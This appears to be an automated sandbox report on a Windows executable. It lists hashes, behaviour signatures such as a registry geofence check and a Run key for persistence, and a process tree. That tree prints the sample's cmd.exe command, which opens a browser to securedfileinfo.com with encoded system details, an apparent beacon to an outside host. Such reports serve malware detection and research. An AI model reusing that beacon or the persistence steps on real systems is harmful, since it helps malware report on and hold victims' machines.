Analysis
-
max time kernel
153s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-11-2022 14:41
Static task
static1
Behavioral task
behavioral1
Sample
2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe
Resource
win10v2004-20220812-en
General
-
Target
2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe
-
Size
143KB
-
MD5
2c2d0a57aa10c93edf20acf0bbc8700d
-
SHA1
e3a352112f9b0745f9b8cb3aaa4f0e035b1af888
-
SHA256
2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e
-
SHA512
e2f787b462df54b7e5ce9758d132f3fe902595d0f63f3b3c296fd782e5de842684f1f7b96748ffca7c69c25ffce53323b8936c29b7325557715611a78af2884e
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45D7:pe9IB83ID5X
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\6daf7907-52b2-4dda-8973-cd41294f34e9.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221128125757.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3440 msedge.exe 3440 msedge.exe 5076 msedge.exe 5076 msedge.exe 4728 identity_helper.exe 4728 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 5076 msedge.exe 5076 msedge.exe 5076 msedge.exe 5076 msedge.exe 5076 msedge.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 4536 2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe 5076 msedge.exe 5076 msedge.exe 5076 msedge.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 4536 2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4536 wrote to memory of 2284 4536 2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe 82 PID 4536 wrote to memory of 2284 4536 2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe 82 PID 4536 wrote to memory of 2284 4536 2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe 82 PID 2284 wrote to memory of 5076 2284 cmd.exe 84 PID 2284 wrote to memory of 5076 2284 cmd.exe 84 PID 5076 wrote to memory of 4248 5076 msedge.exe 86 PID 5076 wrote to memory of 4248 5076 msedge.exe 86 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3456 5076 msedge.exe 89 PID 5076 wrote to memory of 3440 5076 msedge.exe 90 PID 5076 wrote to memory of 3440 5076 msedge.exe 90 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92 PID 5076 wrote to memory of 4476 5076 msedge.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe"C:\Users\Admin\AppData\Local\Temp\2d397ed132b8704c6fb8e1d446fb1f0b68eb96cd9a56b1449f623c29506d494e.exe"1⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5300108^&rsn=plde^&details=^|v6.2.9200x64sp0.0ws^|tt37^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://securedfileinfo.com/404.jsp?chid=5300108&rsn=plde&details=|v6.2.9200x64sp0.0ws|tt37|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8961146f8,0x7ff896114708,0x7ff8961147184⤵PID:4248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:24⤵PID:3456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:84⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:14⤵PID:2496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:14⤵PID:3024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4868 /prefetch:84⤵PID:3452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:14⤵PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5748 /prefetch:84⤵PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:14⤵PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:14⤵PID:1344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6164 /prefetch:84⤵PID:3640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
PID:4636 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x220,0x230,0x7ff7de395460,0x7ff7de395470,0x7ff7de3954805⤵PID:1208
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7640710995308830742,16175004520698815520,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6164 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4728
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4620
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e